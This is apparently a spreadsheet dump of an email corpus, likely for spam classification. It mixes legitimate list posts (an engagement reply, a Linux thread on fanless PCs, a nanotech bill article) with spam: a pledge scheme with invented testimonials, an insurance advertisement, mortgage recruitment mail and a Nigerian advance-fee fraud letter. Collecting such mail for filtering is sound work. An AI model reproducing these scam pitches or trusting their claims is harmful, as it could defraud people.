 Hope you GRAB onto it and hold on tight For the Ride of your life!
 Testimonials
 Hear what average people are doing their first few days:
 We've received 8,000 in 1 day and we are doing that over and over again!' Q.S. in AL
  I'm a single mother in FL and I've received 12,000 in the last 4 days. D. S. in FL
 I was not sure about this when I sent off my $1,000 pledge, but I got back $2,000 the very next day! L.L. in KY
 I didn't have the money, so I found myself a partner to work this with. We have received $4,000 over the last 2 days. I think I made the right decision; don't you? K. C. in FL
 I pick up $3,000 my first day and I they gave me free leads and all the training, you can too! J.W. in CA
 This WILL be the Most IMPORTANT Call you make this Year!
 FREE LEADS!!!!!!! TRAINING!!!!!!!
 ANNOUNCING: We will CLOSE your sales for YOU! And Help you get a Fax Blast IMMEDIATELY Upon Your Entry!!!    YOU Make the MONEY!!!
 FREE LEADS!!!!!!! TRAINING!!!!!!!
 $$DON'T WAIT!!! CALL NOW $$ 1-800-896-6568
 Print and Fax to 1-800-421-6318 or send an email 
 requesting more information to successleads@firemail.de
 Please include your name and telephone number. 
 *Receive 10,000 FREE LEADS just for responding! (a $499.99 value)
 Name___________________________________
 Phone___________________________________
 Fax_____________________________________
 Email___________________________________ 
 This message is sent in compliance of the new e-mail bill. "Per Section 301, Paragraph (a)(2)(C) of S. 1618, further transmissions by the sender of this email may be stopped, at no cost to you, by sending a reply to this email address with the word "REMOVE" in the subject line. Errors, omissions, and exceptions excluded. 
 This is NOT spam! I have compiled this list from our Replicate Database, relative to Seattle Marketing Group, The Gigt, or Turbo Team for the sole purpose of these communications. Your continued inclusion is ONLY by your gracious permission. If you wish to not receive this mail from me, please send an email to  tesrewinter@yahoo.com with "Remove" in the subject and you will be deleted immediately.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [zzzzteana] An announcement
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; Mr Tim Chapman, freelance gentleman of letters of Halifax,
 Yorkshire,
 &gt; announces his betrothal to Dr Ro Gault, virtual reality boffin of
 Cardiff
 &gt; University, Wales. Nuptials to be arranged at later date. No
 flowers.
 &gt;
 &gt; TimC
 &gt; Bloody hell, she said yes!
 Yay!
 Jayne.
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The Best Just Got Better
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_000D_01C25E69.A7BD8E30
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  Any way you slice it...GE Lifetime Protector is a cut above! 
  Underwritten by General Electric Capital Assurance Company and First
 Colony Life Insurance Company
  GE Lifetime Protector universal life insurance cooks the competition
 with competitive premiums	
 Male, Age 55, Best, $500,000 Face Amount, Annual Premiums	 
 GE Lifetime ProtectorSM	 Lifetime
 Premium1
 $6,252 	CSV=$1
 @ Age 1002
 $5,356	 CSV=Face Amt
 @ Age 1002
 $5,841 	
 Product J	 $6,365	 $7,699	 $7,970	 
 Product I	 $6,531	 $6,809	 $7,327	 
 Product L	 $6,348	 $6,250	 $6,630	 
 Product S	 $6,538	 $5,709	 $6,550	 
 Product U	 $8,950	 $5,827	 $6,185	 
 Product T	 $7,581	 $6,729	 $7,372	 
 Product M	 $7,637	 $6,711	 $6,916	 
 Product G	 $7,044	 $5,529	 $6,207	 
 Source: Industry Market research conducted and compiled by GE Financial,
 August 2002. 
 GE Lifetime ProtectorSM is subject to the terms, issue limitations and
 conditions of Policy Form Nos. UL GE02 et al for GE Capital Assurance
 and ULFCL02 et al for First Colony Life, which include exclusion periods
 for death by suicide. GE Lifetime ProtectorSM is not available in all
 states. 
 1Premium that guarantees coverage for the life of the insured according
 to the companies' provisions.
 Companies refer to premium by different names and the conditions for the
 guarantee will vary from company to company. For GE Lifetime
 ProtectorSM, this refers to the designated premium requirement: subject
 to the policy provisions, policy remains in force as long as the sum of
 the premiums paid, less the reduction in policy value for all partial
 withdrawals, equals or exceeds the cumulative total of the designated
 monthly premiums from the policy date to the end of the current policy
 month.
 2Premiums calculated assuming each company's current crediting rate and
 charges. Each column represents the premium required annually to age 100
 to achieve target cash surrender value stated in the column heading.
  	Underwritten by
 General Electric Capital Assurance Company
 First Colony Life Insurance Company
 Lynchburg, VA
 Members of the GE Financial family of companies
  Click Here for GE Lifetime Protector(sm) Information and Quotes from a
 BRAMCO Agency! &lt;http://www.insiq.com/resdir/special/ge/&gt; 	 
 We don't want anyone to receive our mailings who does not wish to
 receive them. This is a professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.insuranceiq.com/optout
 &lt;http://www.insuranceiq.com/optout/&gt; 
 Legal Notice &lt;http://www.insiq.com/legal.htm&gt; 
 ------=_NextPart_000_000D_01C25E69.A7BD8E30
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;The Best Just Got Better&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;=20
 &lt;table width=3D"550" border=3D"1" align=3D"center" cellpadding=3D"0" =
 cellspacing=3D"0" bordercolor=3D"#000000" bgcolor=3D"#084579"&gt;
   &lt;tr&gt;=20
     &lt;td align=3D"center"&gt;
 			&lt;table width=3D"100%" cellpadding=3D"0" cellspacing=3D"0" =
 border=3D"0"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img src=3D"http://iiq.us/images/bram/ge/20020915-101.gif" =
 width=3D"208" height=3D"215" alt=3D'Any way you slice it...GE Lifetime =
 Protector is a cut above!'&gt;&lt;img =
 src=3D"http://iiq.us/images/bram/ge/20020915-102.gif" width=3D"342" =
 height=3D"215"&gt;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/bram/ge/20020915-103.gif" =
 width=3D"550" height=3D"45" alt=3D'Underwritten by General Electric =
 Capital Assurance Company and First Colony Life Insurance Company'&gt;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/bram/ge/20020915-104.gif" =
 width=3D"550" height=3D"51" alt=3D'GE Lifetime Protector universal life =
 insurance cooks the competition with competitive premiums'&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
 			&amp;nbsp;
 			&lt;table width=3D"95%" border=3D"1" cellpadding=3D"0" cellspacing=3D"0" =
 bordercolor=3D"#000000"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;
 						&lt;table width=3D"100%" border=3D"0" cellpadding=3D"2" =
 cellspacing=3D"0" bgcolor=3D"#FFFFFF"&gt;
               &lt;tr&gt;=20
                 &lt;td colspan=3D"4" bgcolor=3D"#006699" =
 align=3D"center"&gt;&lt;font color=3D"#FFFFFF"&gt;&lt;b&gt;&lt;i&gt;
                   Male, Age 55, Best, $500,000 Face Amount, Annual =
 Premiums&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center" valign=3D"bottom"&gt;=20
                 &lt;td width=3D"40%"&gt;&lt;font color=3D"#FF0000" =
 size=3D"3"&gt;&lt;b&gt;&lt;i&gt;GE Lifetime Protector&lt;sup&gt;SM&lt;/sup&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"20%"&gt;&lt;b&gt;&lt;font size=3D"2" =
 color=3D"#006699"&gt;Lifetime&lt;br&gt;
                   Premium&lt;sup&gt;1&lt;/sup&gt;&lt;/font&gt;&lt;br&gt;
                   &lt;font color=3D"#FF0000" =
 size=3D"3"&gt;&lt;i&gt;$6,252&lt;/i&gt;&lt;/font&gt;&lt;/b&gt;=20
                 &lt;/td&gt;
                 &lt;td width=3D"20%"&gt;&lt;b&gt;&lt;font size=3D"2" =
 color=3D"#006699"&gt;CSV=3D$1&lt;br&gt;
                   @ Age 100&lt;sup&gt;2&lt;/sup&gt;&lt;/font&gt;&lt;br&gt;
                   &lt;font color=3D"#FF0000" =
 size=3D"3"&gt;&lt;i&gt;$5,356&lt;/i&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"20%"&gt;&lt;b&gt;&lt;font color=3D"#336699" =
 size=3D"2"&gt;CSV=3DFace Amt&lt;br&gt;
                   @ Age 100&lt;sup&gt;2&lt;/sup&gt;&lt;/font&gt;&lt;br&gt;
                   &lt;font color=3D"#FF0000" =
 size=3D"3"&gt;&lt;i&gt;$5,841&lt;/i&gt;&lt;/font&gt;&lt;/b&gt;=20
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center"&gt;=20
                 &lt;td bgcolor=3D"#99cccc"&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Product =
 J&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;td bgcolor=3D"#99cccc"&gt;&lt;i&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;$6,365&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;td bgcolor=3D"#99cccc"&gt;&lt;i&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;$7,699&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;td bgcolor=3D"#99cccc"&gt;&lt;i&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;$7,970&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center" bgcolor=3D"#CCFFFF"&gt;=20
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Product I&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$6,531&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$6,809&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$7,327&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center" bgcolor=3D"#99CCCC"&gt;=20
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Product L&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$6,348&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$6,250&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$6,630&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center" bgcolor=3D"#CCFFFF"&gt;=20
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Product S&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$6,538&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$5,709&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$6,550&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center" bgcolor=3D"#99CCCC"&gt;=20
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Product U&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$8,950&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$5,827&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$6,185&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center" bgcolor=3D"#CCFFFF"&gt;=20
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Product T&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$7,581&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$6,729&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$7,372&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center" bgcolor=3D"#99CCCC"&gt;=20
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Product M&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$7,637&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$6,711&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$6,916&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center" bgcolor=3D"#CCFFFF"&gt;=20
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Product G&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$7,044&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$5,529&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$6,207&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
 					&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
 			&lt;font color=3D"#FFFFFF" size=3D"1"&gt;&lt;b&gt;Source: Industry Market =
 research conducted and compiled by GE Financial, August 2002.&lt;/b&gt;&lt;/font&gt; =
 			&lt;table width=3D"100%" border=3D"0" cellspacing=3D"2" =
 cellpadding=3D"2"&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"2"&gt; &lt;img =
 src=3D"http://iiq.us/images/bram/ge/20020915-99.gif" width=3D"1" =
 height=3D"8"&gt;&lt;br&gt;
             &lt;font color=3D"#FFFFFF" size=3D"1"&gt;GE Lifetime =
 Protector&lt;sup&gt;SM&lt;/sup&gt;=20
             is subject to the terms, issue limitations and conditions of =
 Policy=20
             Form Nos. UL GE02 et al for GE Capital Assurance and ULFCL02 =
 et al=20
             for First Colony Life, which include exclusion periods for =
 death by=20
             suicide. GE Lifetime Protector&lt;sup&gt;SM&lt;/sup&gt; is not available =
 in all=20
             states.
             &lt;p&gt;&lt;sup&gt;1&lt;/sup&gt;Premium that guarantees coverage for the life =
 of the insured according to the companies' provisions.&lt;br&gt;
               Companies refer to premium by different names and the =
 conditions=20
               for the guarantee will vary from company to company. For =
 GE Lifetime=20
               Protector&lt;sup&gt;SM&lt;/sup&gt;, this refers to the designated =
 premium requirement:=20
               subject to the policy provisions, policy remains in force =
 as long=20
               as the sum of the premiums paid, less the reduction in =
 policy value=20
               for all partial withdrawals, equals or exceeds the =
 cumulative total=20
               of the designated monthly premiums from the policy date to =
 the end=20
               of the current policy month.&lt;/p&gt;
             &lt;p&gt;&lt;sup&gt;2&lt;/sup&gt;Premiums calculated=20
               assuming each company's current crediting rate and =
 charges. Each=20
               column represents the premium required annually to age 100 =
 to achieve=20
               target cash surrender value stated in the column =
 heading.&lt;/p&gt;&lt;/font&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"2"&gt;&lt;img =
 src=3D"http://iiq.us/images/bram/ge/20020915-99.gif" width=3D"1" =
 height=3D"1"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"44%"&gt;&lt;img =
 src=3D"http://iiq.us/images/bram/ge/20020915-106.gif" width=3D"237" =
 height=3D"85"&gt;&lt;/td&gt;
           &lt;td width=3D"56%"&gt;=20
             &lt;p&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF" size=3D"2"&gt;Underwritten by&lt;br&gt;
               General Electric Capital Assurance Company&lt;br&gt;
               First Colony Life Insurance Company&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
             &lt;p&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF" size=3D"1"&gt;&lt;i&gt;Lynchburg, =
 VA&lt;br&gt;
               Members of the GE Financial family of =
 companies&lt;/i&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr align=3D"center"&gt;=20
           &lt;td colspan=3D"2"&gt;&lt;img =
 src=3D"http://iiq.us/images/bram/ge/20020915-109.gif" width=3D"332" =
 height=3D"113"&gt;&lt;a href=3D"http://www.insiq.com/resdir/special/ge/"&gt;&lt;img =
 src=3D"http://iiq.us/images/bram/ge/20020915-110.gif" alt=3D"Click Here =
 for GE Lifetime Protector(sm) Information and Quotes from a BRAMCO =
 Agency!" width=3D"183" height=3D"113" border=3D"0"&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
 		&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td width=3D"100%" bgcolor=3D"#cccccc" align=3D"center"&gt;
 			&lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt;We don't =
 want anyone to receive our mailings who does not=20
 			wish to receive them. This is a professional communication=20
 			sent to insurance professionals. To be removed from this mailing=20
 			list, &lt;b&gt;DO NOT REPLY&lt;/b&gt; to this message. Instead, go here: &lt;a =
 href=3D"http://www.insuranceiq.com/optout/"&gt;=20
 			http://www.insuranceiq.com/optout&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;a href=3D"http://www.insiq.com/legal.htm"&gt;&lt;font size=3D"1" =
 face=3D"Arial, Helvetica, sans-serif"&gt;Legal Notice &lt;/font&gt;&lt;/a&gt;=20
 &lt;/center&gt;
 &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_000D_01C25E69.A7BD8E30--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Why the mortgage email?
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- saved from url=(0022)http://internet.e-mail --&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;STYLE&gt;
 &lt;/STYLE&gt;
 &lt;BODY vLink=#cc0033 aLink=#cc0033 link=#cc0033 topMargin=0 bgcolor="navy"&gt;
 &lt;DIV&gt;&lt;/DIV&gt;
 &lt;DIV class=Section1&gt;
 &lt;P class=MsoNormal&gt;&lt;FONT face=Arial color=navy size=2&gt;&lt;SPAN 
 style="FONT-SIZE: 10pt; COLOR: navy; FONT-FAMILY: Arial"&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P class=MsoNormal&gt;&lt;FONT face="Times New Roman" color=black size=3&gt;&lt;SPAN 
 style="FONT-SIZE: 12pt; COLOR: windowtext"&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P class=MsoNormal&gt;&lt;FONT face="Times New Roman" color=black size=3&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;DIV align=center&gt;
 &lt;TABLE class=MsoNormalTable style="WIDTH: 262.5pt" width="480" cellSpacing=0 
 cellPadding=0 border=0 bgcolor="white"&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
 							&lt;TD 
     style="PADDING-RIGHT: 0in; PADDING-LEFT: 0in; PADDING-BOTTOM: 0in; PADDING-TOP: 0in" colspan="3" 
     vAlign=top&gt;
       &lt;P class=MsoNormal style="TEXT-ALIGN: center" align=center&gt;&lt;FONT 
       face="Times New Roman" color=black size=3&gt;&lt;SPAN 
       style="FONT-SIZE: 12pt"&gt;
       &lt;IMG 
       src="http://210.192.111.24/loanoriginators/immail/mailer_003.jpg" border=0 
       NOSEND="1" width="406" height="125"&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
 						&lt;/TR&gt;
 						&lt;TR style="HEIGHT: 51pt" height="75"&gt;
     &lt;TD 
     style="PADDING-RIGHT: 0in; PADDING-LEFT: 0in; PADDING-BOTTOM: 0in; PADDING-TOP: 0in; HEIGHT: 51pt" 
     vAlign=top colSpan=3 height="75"&gt;
 								&lt;P class=MsoNormal style="TEXT-ALIGN: center" align=center&gt;&lt;B&gt;&lt;FONT 
       face=Arial color=black size=2&gt;&lt;SPAN 
       style="FONT-WEIGHT: bold; FONT-SIZE: 10pt; FONT-FAMILY: Arial"&gt;If you thought that in order to be a Mortgate Loan Officer, you had to Graduate from College, be Certified, Licensed or Bonded. . . &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;b&gt;&lt;font face=Arial color=black size=2&gt;&lt;span style="FONT-WEIGHT: bold; FONT-SIZE: 10pt; FONT-FAMILY: Arial"&gt;Think Again!&lt;/span&gt;&lt;/font&gt;&lt;/b&gt;&lt;/P&gt;
 								&lt;P class=MsoNormal style="TEXT-ALIGN: center" align=center&gt;&amp;nbsp;&lt;/P&gt;
 							&lt;/TD&gt;&lt;/TR&gt;
 						&lt;tr style="HEIGHT: 5.25pt"&gt;
 							&lt;td style="PADDING-RIGHT: 0in; PADDING-LEFT: 0in; PADDING-BOTTOM: 0in; WIDTH: 31.5pt; PADDING-TOP: 0in; HEIGHT: 5.25pt"&gt;&lt;/td&gt;
 							&lt;td style="PADDING-RIGHT: 0in; PADDING-LEFT: 0in; PADDING-BOTTOM: 0in; WIDTH: 279pt; PADDING-TOP: 0in; HEIGHT: 5.25pt" valign=top width="372"&gt;
 								&lt;p class=MsoNormal style="TEXT-ALIGN: center" align=center&gt;
               &lt;map name=MicrosoftOfficeMap0&gt;
                 &lt;area shape=rect coords="0, 0, 154, 38"
 								 href="http://210.192.111.24/loanoriginators/index.php?Aff=3"&gt;
               &lt;/map&gt;
               &lt;img height=37 src="http://210.192.111.24/loanoriginators/immail/button.gif" width=151 usemap=#MicrosoftOfficeMap0 border=0 nosend="1"&gt;&lt;/p&gt;
 							&lt;/td&gt;
 							&lt;td style="PADDING-RIGHT: 0in; PADDING-LEFT: 0in; PADDING-BOTTOM: 0in; WIDTH: 0.5in; PADDING-TOP: 0in; HEIGHT: 5.25pt" width="28"&gt;&lt;/td&gt;
 						&lt;/tr&gt;
 						&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV&gt;
 &lt;P class=MsoNormal style="MARGIN-BOTTOM: 12pt; TEXT-ALIGN: center" 
 align=center&gt;&lt;/P&gt;
 &lt;P class=MsoNormal style="TEXT-ALIGN: center" align=center&gt;&lt;FONT 
 face="Times New Roman" color=black size=3&gt;&lt;SPAN 
 style="FONT-SIZE: 12pt"&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;&lt;/DIV&gt;&lt;P align=center&gt;&lt;B&gt;&lt;FONT size=2&gt;&lt;font color="Silver"&gt;This message is coming to you as a result of an Opt-in Relationship our Clients have had with you. &lt;br&gt;If you simply wish to be Removed from all future Messages, 
 then&lt;/FONT&gt;&lt;FONT color=#ff0000&gt; &lt;a href="mailto:nospamsw@yahoo.com"&gt;CLICK 
 HERE&lt;/a&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;&lt;/BODY&gt;&lt;/HTML&gt;
  [^(PO1:KJ)_8J7BJK9^":}H&amp;*TG0BK5NKIYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, 20 Jul 2002 18:15:12 +0100
 kevin lyda claiming to think:
 &gt; On Fri, Jul 19, 2002 at 10:19:50PM -0700, Rick Moen wrote:
 &gt; &gt; Some people strip down old 486 boxes, take out the hard drive, disable
 &gt; &gt; the fans, and run the thing from just a floppy drive or a CDR you've
 &gt; &gt; burned for the purpose.  
 &gt; 
 &gt; what about using a pcmcia card and a compaq flash card?  or doing an
 &gt; nfs boot to a server in a noiser part of the house?  (the boiler room
 &gt; or something like that)
 &gt; 
 hmm. there are versions of OpenBSD that run from a 32M compact flash IIRC.
 and antefacto's software ran in 64M.
 there are CF-&gt;IDE adapters anyway, so get a 256M CF (100+), mount it RO,
 and use that?
 /me is also in the market for one of the 60W fanless PSU's that antefacto had,
 if someone wants to get a few of them.
 L.
 -- 
      dBP   dBBBBb | If you're looking at me to be an accountant
               dBP | Then you will look but you will never see
    dBP    dBBBK'  | If you're looking at me to start having babies
   dBP    dB' db   | Then you can wish because I'm not here to fool around
  dBBBBP dBBBBP'   | Belle &amp; Sebastian (Family Tree)
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: BUSINESS PARTNERSHIP(URGENT/CONFIDENTIAL)
</t>
  </si>
  <si>
    <t xml:space="preserve">Mr.Vincent Nnaji,
  Standard Trust Bank Ltd,
  Lagos,Nigeria.
  Dear Sir,
  I am Mr.Vincent Nnaji, Bank Manager of Standard Trust Bank,Lagos,Nigeria. I have urgent and very confidential business proposition for you. 
 On January 6,1998 a Foreign Oil Consultant Foreign contractor with the Nigerian National Petroleum Corporation Mr. James Herbert made a numbered time Fixed Deposit for twelve calendar months valued at US$20M ( Twenty Million United States Dollars) in my branch.
 Upon maturity I sent a routine notification to his forwarding address but got no reply. After a month we sent a reminder and finally we discovered from his contract employers the Nigerian National Petroleum Corporation that Mr. James Herbert died from an automobile accident. 
 On further investigation, I found out that he died without making a WILL and all attempts to trace his next of kin was fruitless. I therefore made further investigation and discovered that Mr.James Herbert did not declare any next of kin or relations in all his official documents including his Bank Deposit paperwork in my Bank. This sum of US$20M has carefully been moved out of my bank to a security company for safe-keeping. No one will ever come forward to claim it. 
 According to Nigerian Law at the expiration of 5 years the money will revert to the ownership of the Nigerian Government if nobody applies to claim the fund. Consequently my proposal is that I will like you as a Foreigner to stand in as the owner of the money I deposited it in a security company in two trunk boxes though the security company does not know the contents of the boxes as I tagged them to be photographic materials for export I am writing you because I as a public servant I cannot operate a foreign account or have an account that is more than $1m.
  I want to present you as the owner of the boxes in the security company so you can be able to claim them with the help of my attorney. All these are to make sure that the fruits of this old man's labour will not get into the hands of some corrupt government officials. 
 This is simple. I will like you to provide immediately your full names and address so that the Attorney will prepare the necessary documents which will put you in place as the owner of the boxes. The money will be shared in the ratio of 70% for me and 25% for you and 5% will take care of all expenses. 
 There is no risk at all as all the paperwork for this transaction will be done by the Attorney and this will guarantee the successful execution of this transaction. If you are interested, please reply immediately via my private email address. 
 Upon your response I shall then provide you with more details and relevant documents that will help you understand the transaction. Please observe with utmost confidentiality and be rest assured that this transaction would be most profitable for both of us because I shall require your assistance to invest my share in your country.
  Awaiting your urgent reply via my private email to indicate your interest. 
 Thanks and Regards,
  MR.VINCENT NNAJI.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Senate Committee Passes Nanotech Bill
</t>
  </si>
  <si>
    <t xml:space="preserve">Weird... I never thought the govmint would get into funding this. You know
 'weapons of mass destruction'. etc. etc.
 ==
 http://dc.internet.com/news/article.php/10849_1467121
 September 20, 2002
 Senate Committee Passes Nanotech Bill
 By Roy Mark
 The Senate Commerce Committee unanimously passed on Thursday legislation to
 promote nanotechnology research and development. Introduced by Sen. Ron
 Wyden (D-Ore.), the 21st Century Nanotechnology Research and Development Act
 would create the National Nanotechnology Research Program. The bill is
 co-sponsored by Sen. Joe Lieberman (D-Conn.) and Sen. George Allen (R-Va.).
 The proposed program would be a coordinated interagency effort that would
 support long-term nanoscale research and development and promote effective
